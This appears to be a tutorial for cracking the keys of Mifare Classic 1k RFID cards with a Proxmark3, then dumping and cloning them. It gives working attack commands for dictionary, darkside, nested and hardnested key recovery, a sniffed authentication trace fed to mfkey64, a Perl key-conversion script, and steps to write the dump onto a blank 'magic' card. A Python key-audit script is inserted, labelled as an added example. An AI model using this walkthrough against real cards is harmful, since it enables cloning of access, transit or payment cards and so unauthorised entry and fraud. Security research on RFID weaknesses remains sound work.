Proxmark3 Mifare Classic 1k (Crack/Dump/Duplicate)
The darkside attack (for weak Mifare PRNGs) can be run with low-cost hardware such as the ACR122U, using mfcuk/mfoc on top of libnfc.
Nowadays this attack no longer covers many Mifare Classic cards; the Proxmark3 is the better choice. On the Proxmark3, the weak-PRNG method is straightforward, but the sniff/hardnested method for cards with a hardened PRNG is trickier.
1. First Of All – Try Generic Keys…
for example with a somekeys.txt taken from Mifare Classic Tool (Android):
pm3> hf mf chk *1 A 1234567890ab somekeys.txt
If you are lucky you now have a key; it still has to be checked against key B.
pm3> hf mf chk *1 ? KEY_FOUND
If you don’t have B, jump to the “Crack other keys” part of the relevant section 2. If you have B, you have all the A/B keys and can jump to section 3.
2. Method For Weak
pm3> hf mf mifare
pm3> hf mf chk 0 A KEY_FOUND (Check Found Key On Block 0 A)
Crack other keys
pm3> hf mf nested 1 0 A KEY_FOUND d (recover the other sectors' keys from the known one)
2. Method For Hard
Sniff
The fun part: you have to fix the card to the Proxmark3 (duct tape works), connect it to a laptop and put the Proxmark3 in sniff mode. If you have a USB Y-cable, you can also power the Proxmark3 from a USB power bank and plug it back into your desktop afterwards to read the traces. The best way to sniff the whole transaction is to put the Proxmark3 between the card and the reader: push it against the reader, well aligned, and repeat 3-4 times to get at least one good sniffed transaction.
pm3> hf 14a sniff
--- trigger the reader with the card (proxmark in between)
--- remove and repeat to get many traces...
--- push the proxmark button to stop
--- read the traces
pm3> hf 14a list
Mifare Classic protocol
Trace example
561882: 1 : 26
64: 2 : TAG 04 00
10217: 2 : 93 20
64: 5 : TAG [[ 9c 59 9b 32 ]] 6c UID
12313: 9 : 93 70 9c 59 9b 32 6c 6b 30
64: 3 : TAG 08 b6 dd
923318: 4 : 60 ((3C)) f5 7b AUTH Block 60
112: 4 : TAG [[ 82 a4 16 6c ]] Nonce Tag (NT)
6985: 8 : [[ a1 e4! 58 ce! ]] [[ 6e ea! 41 e0! ]] NR , AR
64: 4 : TAG [[ 5c! ad f4 39! ]] AT
811513: 4 : 8e 0e! 5d! b9 AUTH Block 0 N
112: 4 : TAG 5a! 92 0d! 85! Nonce Tag (NT)
6946: 8 : 98! d7 6b! 77 d6 c6 e8 70 NR , AR
64: 4 : TAG ca 7e! 0b! 63! AT
670868: 4 : [[ 3e! 70 9c! 8a ]]
112: 4 : TAG 36! 41 24! 79
9505: 8 : 1b! 8c 3a! 48! 83 5a 4a! 27
64: 4 : TAG 40! 6a! 99! 4b
905612: 4 : c9 7c 64! 13! !crc
112: 4 : TAG b5! ab! 1d! 2b
6936: 8 : 7e! d2 5c! ca! 4b! 50! 88! c4 !crc
64: 4 : TAG bf dd 01 be!
987853: 4 : 56 98 49 d6! !crc
### the last argument (3e709c8a, the bracketed block following AT in the trace) is optional
./tools/mfkey/mfkey64 9c599b32 82a4166c a1e458ce 6eea41e0 5cadf439 3e709c8a
Check key against A/B
pm3> hf mf chk *1 ? KEY_FOUND
...
You can possibly skip the next step if the key is the same for A and B.
Crack other keys
Replace 60 with the decimal value of the hexadecimal block number shown between double parentheses in the trace (ours is ‘3C’, i.e. 60).
pm3> hf mf hardnested 0 A KEY_FOUND 60 B s w
pm3> sc r hard_autopwn -k KEY_FOUND -a
Keys to dumpkeys.bin (perl):
#!/usr/bin/perl
use strict;
use warnings;

# Paste the full key table printed by the Proxmark3 (one line per sector) here.
my $v = <<'EOF';
|000| a0a0a0a0a0a0 | 1 | b0b0b0b0b0b0 | 1 |
|001| a0a0a0a0a0a0 | 1 | b0b0b0b0b0b0 | 1 |
...
|015| a0a0a0a0a0a0 | 1 | b0b0b0b0b0b0 | 1 |
EOF

# Collect every 12-hex-digit key in table order: A0, B0, A1, B1, ...
my @a;
while ($v =~ /([0-9a-f]{12})/ig) { push @a, $1; }

# dumpkeys.bin layout expected by 'hf mf dump': the 16 key A entries
# (6 raw bytes each, sectors 0..15) followed by the 16 key B entries.
open my $fh, '>', 'dumpkeys.bin' or die "dumpkeys.bin: $!";
binmode $fh;
foreach my $odd (0, 1) {                   # 0 = key A column, 1 = key B column
    for (my $i = $odd; $i <= $#a; $i += 2) {
        print $fh pack('H*', $a[$i]);      # 12 hex digits -> 6 bytes
    }
}
close $fh;
Run it and you get a proper dumpkeys.bin, which ‘hf mf dump’ relies on.
vim hex2dumpkeys.pl
--- paste the full key table into it.
perl hex2dumpkeys.pl
3. From Keys To Write
Verify:
xxd dumpkeys.bin
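As an added example (not from the original post), this Python script decodes a dumpkeys.bin using the layout the Perl script above writes (16 key A entries, then 16 key B entries) and flags sectors still protected by well-known default keys, which is what you want to see when auditing a dumped card rather than just eyeballing xxd output. The default-key shortlist and the sample card are constructed for the example.

```python
from __future__ import annotations

# Layout assumed (Proxmark3 'hf mf dump' convention): 16 six-byte key A entries
# for sectors 0..15, followed by the 16 six-byte key B entries (192 bytes total).
SECTORS = 16
KEY_LEN = 6
FILE_LEN = 2 * SECTORS * KEY_LEN  # 192 bytes

# Shortlist of well-known default keys (constructed for this example, not exhaustive).
WELL_KNOWN_KEYS = {"ffffffffffff", "a0a1a2a3a4a5", "d3f7d3f7d3f7", "000000000000"}

def decode_dumpkeys(data: bytes) -> list[tuple[int, str, str]]:
    """Return [(sector, key_a_hex, key_b_hex), ...]; raise on a malformed file."""
    if len(data) != FILE_LEN:
        raise ValueError(f"expected {FILE_LEN} bytes, got {len(data)}")
    keys_a, keys_b = data[:SECTORS * KEY_LEN], data[SECTORS * KEY_LEN:]
    return [
        (s, keys_a[s * KEY_LEN:(s + 1) * KEY_LEN].hex(),
            keys_b[s * KEY_LEN:(s + 1) * KEY_LEN].hex())
        for s in range(SECTORS)
    ]

def encode_dumpkeys(table) -> bytes:
    """Inverse of decode_dumpkeys: the same packing the Perl script performs."""
    keys_a = b"".join(bytes.fromhex(a) for _, a, _ in table)
    keys_b = b"".join(bytes.fromhex(b) for _, _, b in table)
    return keys_a + keys_b

def audit(table) -> dict:
    """Flag sectors still protected by a well-known key, and sectors where A == B."""
    defaults = sorted(s for s, a, b in table if a in WELL_KNOWN_KEYS or b in WELL_KNOWN_KEYS)
    same_ab = sorted(s for s, a, b in table if a == b)
    return {"default_key_sectors": defaults, "a_equals_b_sectors": same_ab}

# Constructed sample card: sectors 0-14 carry per-sector keys, sector 15 was left
# at the factory default (the case a key audit should catch).
SAMPLE_TABLE = [(s, f"a0a0a0a0a0{s:02x}", f"b0b0b0b0b0{s:02x}") for s in range(15)]
SAMPLE_TABLE.append((15, "ffffffffffff", "ffffffffffff"))
SAMPLE_FILE = encode_dumpkeys(SAMPLE_TABLE)

if __name__ == "__main__":
    for sector, a, b in decode_dumpkeys(SAMPLE_FILE):
        print(f"|{sector:03d}| {a} | {b} |")
    print(audit(decode_dumpkeys(SAMPLE_FILE)))
```

To check a real file, replace SAMPLE_FILE with open("dumpkeys.bin", "rb").read().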
Dump the card to dumpdata.bin
pm3> hf mf dump 1
Prepare .eml
python pm3_mfd2eml.py dumpdata.bin dumpdata.eml
Load it onto a blank Magic/Chinese card
pm3> hf mf cload dumpdata